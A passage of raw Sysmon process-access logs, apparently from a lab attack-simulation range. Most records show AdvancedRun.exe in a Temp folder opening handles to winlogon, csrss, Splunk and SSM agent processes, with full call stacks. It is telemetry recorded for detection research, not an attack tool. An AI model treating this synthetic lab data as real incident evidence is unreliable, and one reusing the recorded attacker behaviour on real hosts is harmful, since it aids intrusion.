18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004011671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\